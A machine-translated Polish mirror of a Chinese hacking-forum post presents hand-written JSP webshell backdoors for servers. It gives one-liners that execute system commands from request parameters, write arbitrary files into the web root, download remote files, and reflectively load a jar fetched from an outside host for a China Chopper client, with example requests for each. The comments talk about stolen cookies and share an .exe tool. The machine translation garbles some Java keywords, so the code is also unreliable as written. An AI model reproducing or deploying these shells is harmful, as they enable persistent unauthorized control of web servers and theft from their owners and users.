Ten artykuł jest lustrzanym artykułem tłumaczenia maszynowego, kliknij tutaj, aby przejść do oryginalnego artykułu.

Widok: 14991|Odpowiedź: 7

[Narzędzia bezpieczeństwa] Ręcznie pisane JSP backdoor

[Skopiuj link]
Opublikowano 02.01.2015 18:46:57 | | | |
Przeniesiono z: http://p2j.cn/?p=1627
1. Wykonaj polecenia systemowe:
Wykonaj polecenia systemowe bez echa:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Prośba: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Po egzekucji nie będzie echa, co jest bardzo wygodne dla odbijających się muszli.
Są echa związane z weryfikacją hasła:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        bajt[] b = nowy bajt[2048];        out.print("<pre>);        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>);    }%>
Prośba: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Zakoduj ciąg i zapisz go do określonego pliku:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Prośba: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Napisz do katalogu internetowego:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Prośba: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Prośba: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Napisz do katalogu internetowego:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Prośba: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Pobierz zdalny plik (jeśli nie używasz narzędzi Apache IO, nie możesz przekonwertować strumienia wejściowego na bajt, więc jest bardzo długi...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    bajt[] b = nowy bajt[1024];    java.io.ByteArrayOutputStream baos = nowy java.io.ByteArrayOutputStream();    int a = -1;    while ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Prośba: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Pobierz na ścieżkę internetową:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    bajt[] b = nowy bajt[1024];    java.io.ByteArrayOutputStream baos = nowy java.io.ByteArrayOutputStream();    int a = -1;    while ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Prośba: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Czwarte: Odbicie wzywa zewnętrzny słoik, udoskonal tylne drzwi
Jeśli nie podoba ci się powyższa funkcja tylnych wejść jest zbyt słaba i przestarzała, możesz spróbować tego:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Prośba: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Połączenie noża kuchennego: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, hasło 023.

Rozwiązanie:
Użyj reflection, aby załadować zewnętrzny jar do bieżącej aplikacji, a reflection wykonuje wynik przetwarzania wyjściowego. request.getParameterMap() zawiera wszystkie żądane parametry. Ponieważ zewnętrzny pakiet jar jest załadowany, serwer musi mieć dostęp do tego adresu jar.




Poprzedni:Kryzys związany z plikiem tekstowym TXT
Następny:Java MD5 szyfrowanie, szyfrowanie Base64 i deszyfrowanie Java wykonuje kod źródłowy poleceń systemowych
Opublikowano 02.01.2015 20:17:30 |
Ostatnio badałeś JSP backdoor?
 Ziemianin| Opublikowano 02.01.2015 20:39:44 |
Admin opublikowano 2015-1-2 20:17
Ostatnio badałeś JSP backdoor?

Czy kiedykolwiek widziałeś JSP w jednym zdaniu? Znalazłem je, nie studiowałem tego dogłębnie, nie rozumiałem xss, w końcu wczoraj dostałem ciasteczka i nie wiem, jak zmodyfikować przesyłanie plików cookie
Opublikowano 02.01.2015 20:44:40 |
Delver_Si Opublikowano 2015-1-2 20:39
Czy kiedykolwiek widziałeś JSP w jednym zdaniu? Znalazłem to, nie kopałem głębiej, nie rozumiałem xss, w końcu wczoraj dostałem ciasteczka, nie wiem, jak zmodyfikować cooki...

To nie będą moje ciasteczka skradzione z spersonalizowanym plikiem podpisu,,,

Użyj wtyczki HackBar w Firefoxie
Opublikowano 02.01.2015 20:48:57 |
Delver_Si Opublikowano 2015-1-2 20:39
Czy kiedykolwiek widziałeś JSP w jednym zdaniu? Znalazłem to, nie kopałem głębiej, nie rozumiałem xss, w końcu wczoraj dostałem ciasteczka, nie wiem, jak zmodyfikować cooki...

Przeglądarka wielofunkcyjna Ghost Brother v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Liczba pobranych plików: 7, Cena sprzedaży: 1 Zbożowy MB)
 Ziemianin| Opublikowano 02.01.2015 20:57:50 |
Admin opublikowano 2015-1-2 20:44
To nie będą moje ciasteczka skradzione z spersonalizowanym plikiem podpisu,,,

Użyj wtyczki HackBar w Firefoxie

Wczoraj wolne drzwi były konwulsyjne, nie mogłem się połączyć i nie mogłem wejść do sklepu Firefox.
 Ziemianin| Opublikowano 02.01.2015 20:59:01 |
Admin opublikowano 2015-1-2 20:44
To nie będą moje ciasteczka skradzione z spersonalizowanym plikiem podpisu,,,

Użyj wtyczki HackBar w Firefoxie

Dz nie ma takiej luki prawnej
Opublikowano 02.01.2015 21:00:22 |
Delver_Si Opublikowano 2015-1-2 20:59
Dz nie ma takiej luki prawnej

Nie wiem, możesz to przetestować, nie psuj mojej bazy danych   

Wszyscy używamy przeglądarki Tor, żeby omijać mur

Zrzeczenie się:
Całe oprogramowanie, materiały programistyczne lub artykuły publikowane przez Code Farmer Network służą wyłącznie celom edukacyjnym i badawczym; Powyższe treści nie mogą być wykorzystywane do celów komercyjnych ani nielegalnych, w przeciwnym razie użytkownicy ponoszą wszelkie konsekwencje. Informacje na tej stronie pochodzą z Internetu, a spory dotyczące praw autorskich nie mają z nią nic wspólnego. Musisz całkowicie usunąć powyższą zawartość z komputera w ciągu 24 godzin od pobrania. Jeśli spodoba Ci się program, wspieraj oryginalne oprogramowanie, kup rejestrację i korzystaj z lepszych, autentycznych usług. W przypadku naruszenia praw prosimy o kontakt mailowy.

Mail To:help@itsvse.com